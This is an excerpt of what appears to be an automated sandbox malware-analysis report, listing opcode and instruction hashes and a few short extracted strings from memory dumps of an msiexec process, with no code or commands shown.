                                                                                        • Instruction Fuzzy Hash: A90145326002186FCB069E998800AAE3FE7EBC9250F244096F904DB294DA798D118BB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 11d7deb7a9c6309cb0c54fdecf3f842fcb2743e63808e3cd45b9b65506c02448
                                                                                        • Instruction ID: a16e4b280484937d3a26bcc4fc09f198ed7d0d0ff9d304c62f60793cda893e66
                                                                                        • Opcode Fuzzy Hash: 11d7deb7a9c6309cb0c54fdecf3f842fcb2743e63808e3cd45b9b65506c02448
                                                                                        • Instruction Fuzzy Hash: B0114C74D4420AEFCF01DFA4D8449AEBBB1FB89300F004466E924A3354D7385A59CF92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 02f84196f3af82e3ac9aa6dcb294fe68913f65dc61c8e2f6659aa465313841a5
                                                                                        • Instruction ID: fab5fcbb989bc145ee5ecf864973a2babeb1a70f80f8bb124a9c53f925e74c23
                                                                                        • Opcode Fuzzy Hash: 02f84196f3af82e3ac9aa6dcb294fe68913f65dc61c8e2f6659aa465313841a5
                                                                                        • Instruction Fuzzy Hash: 36E02035E107168BC701EBF0DC400EDBB34AD81211B548557C0B437040DB307159C7A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 63098fe7fbb59d3435391b6fe030a9a7b5cb180b5432ff072308a1680542d082
                                                                                        • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                        • Opcode Fuzzy Hash: 63098fe7fbb59d3435391b6fe030a9a7b5cb180b5432ff072308a1680542d082
                                                                                        • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1a2764b9061251f8adf7920be9bf3b60e27be1f7a157ecaf8b84123b4186fc13
                                                                                        • Instruction ID: 66221a7558603f2fb1783f6210db504a06d029f0cd32d6c87b2b65f5ef888c6d
                                                                                        • Opcode Fuzzy Hash: 1a2764b9061251f8adf7920be9bf3b60e27be1f7a157ecaf8b84123b4186fc13
                                                                                        • Instruction Fuzzy Hash: 00D04235E5410DCBCB20EFA9E9888DCBB71EB59321B20502AD929A3252D63454558F11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 435cb2eed5f8d5ed4ec229c3d18f869414e2dc589c2b91ab6b89457d8b77d75d
                                                                                        • Instruction ID: 5d4802d1fc994a802eb65dc53fc41f4d64e3a35ee56ab6b61d55d76e94a4e098
                                                                                        • Opcode Fuzzy Hash: 435cb2eed5f8d5ed4ec229c3d18f869414e2dc589c2b91ab6b89457d8b77d75d
                                                                                        • Instruction Fuzzy Hash: 5DD0673AB40018DFCB149F99E8408DDF7B6FB98221B148116E915A3261D6319925DB64
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 698e0a60f217539fab9d45b24b98f6279ddb10f9d4db44e7f987767cd099f28f
                                                                                        • Instruction ID: c5f343cc5bf8767b580d41857aeb0dd59f8d9cbc123cb2d694f533429b0465d1
                                                                                        • Opcode Fuzzy Hash: 698e0a60f217539fab9d45b24b98f6279ddb10f9d4db44e7f987767cd099f28f
                                                                                        • Instruction Fuzzy Hash: A6C012300843284EC642F765DD45969BBAFFAC0214B408620A00A0A76EEFBDA8894BE0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                        • API String ID: 0-2525668591
                                                                                        • Opcode ID: 3123a19d2b4499923b77ea49f0d27ecc938b93a785b4d7fe8a54d6f5d8188872
                                                                                        • Instruction ID: 0c2a4061582e91dabaee9a42ddf05c1ae3c28a83aa17811273e4bcb692ead960
                                                                                        • Opcode Fuzzy Hash: 3123a19d2b4499923b77ea49f0d27ecc938b93a785b4d7fe8a54d6f5d8188872
                                                                                        • Instruction Fuzzy Hash: 3BE16E30A00119DFCB05CFEAC885A9DBBF2BF48324F258055EA99AB2A5D734DD81CB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5a199de15a2536fee77c77acfb03b628a9082929df19ffb388ac2ba391b129de
                                                                                        • Instruction ID: c3bc746619d891e62b20e6185c50a1110b902dff9e4bd63902f2d405068a0c34
                                                                                        • Opcode Fuzzy Hash: 5a199de15a2536fee77c77acfb03b628a9082929df19ffb388ac2ba391b129de
                                                                                        • Instruction Fuzzy Hash: 68C19F74E00218CFDB54DFA5C994B9DBBB2BF89304F2080A9D818AB365DB359E85CF11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ccd27e2095f7596f7dadd3266ea89c0f70e3097cd414a292d5ceb6324cf875ac
                                                                                        • Instruction ID: b8359b88e4dd99b230fe859ab4b60761c302d57582e5a286c408c79a79c5753e
                                                                                        • Opcode Fuzzy Hash: ccd27e2095f7596f7dadd3266ea89c0f70e3097cd414a292d5ceb6324cf875ac
                                                                                        • Instruction Fuzzy Hash: 72512470D05208CBDB04DFEAD444BDEBBF2BB89310F209129E4287B2A4DB759985CF51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2834a2a8ffd234f7e4a004c72411e7e9597cf69c0c3450328b85c696221a6a48
                                                                                        • Instruction ID: c8b58711b97b66540fcbacb567b3d0e47066f6257a08b05194ca8c3e45473a65
                                                                                        • Opcode Fuzzy Hash: 2834a2a8ffd234f7e4a004c72411e7e9597cf69c0c3450328b85c696221a6a48
                                                                                        • Instruction Fuzzy Hash: 96510070D05208CFDB04DFEAD484B9EBBB2FB49324F209119E429BB2A5D7399981CF51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                        • API String ID: 0-1932283790
                                                                                        • Opcode ID: df0d8ade0315c79c5160fc9a3faddc4e6c1342fcfb16fbc1e429e43692ad1a20
                                                                                        • Instruction ID: ea8ff4e8e3edb54cf8712eff183e46f522fa8b2fca49be44b96bdd15e0b24e55
                                                                                        • Opcode Fuzzy Hash: df0d8ade0315c79c5160fc9a3faddc4e6c1342fcfb16fbc1e429e43692ad1a20
                                                                                        • Instruction Fuzzy Hash: F9125C30A002099FCB15CFAAD985A9EBBF2FF48324F208559E659DB361D731ED85CB50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                        • API String ID: 0-2732225958
                                                                                        • Opcode ID: bb4f2f11366e2b17b87493f23a5feaf1f41b22708da7fc98e1af546db9947b6b
                                                                                        • Instruction ID: c6dc3156f23076a37f2bcfb69f1ca22faa6562f3898394735cba5fc773b18d9c
                                                                                        • Opcode Fuzzy Hash: bb4f2f11366e2b17b87493f23a5feaf1f41b22708da7fc98e1af546db9947b6b
                                                                                        • Instruction Fuzzy Hash: 53316231E0021D8BDB64CFAA89817AFB7B6AB84324F104579C51DA7255EB30CEC1CB92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                        • API String ID: 0-3001612457
                                                                                        • Opcode ID: 4ea1975656993104c46907583e8804f0dd4fd5da4fb3378123bddcdf587b1486
                                                                                        • Instruction ID: d3497f53d55545f85f34d9dc54cf9df0132f14f78aa9438bf39c7f191444bff9
                                                                                        • Opcode Fuzzy Hash: 4ea1975656993104c46907583e8804f0dd4fd5da4fb3378123bddcdf587b1486
                                                                                        • Instruction Fuzzy Hash: EC01BC71B401088FCB048EAEC54490933EBAFC8AB4721446AE549CF3B7DA32EC818750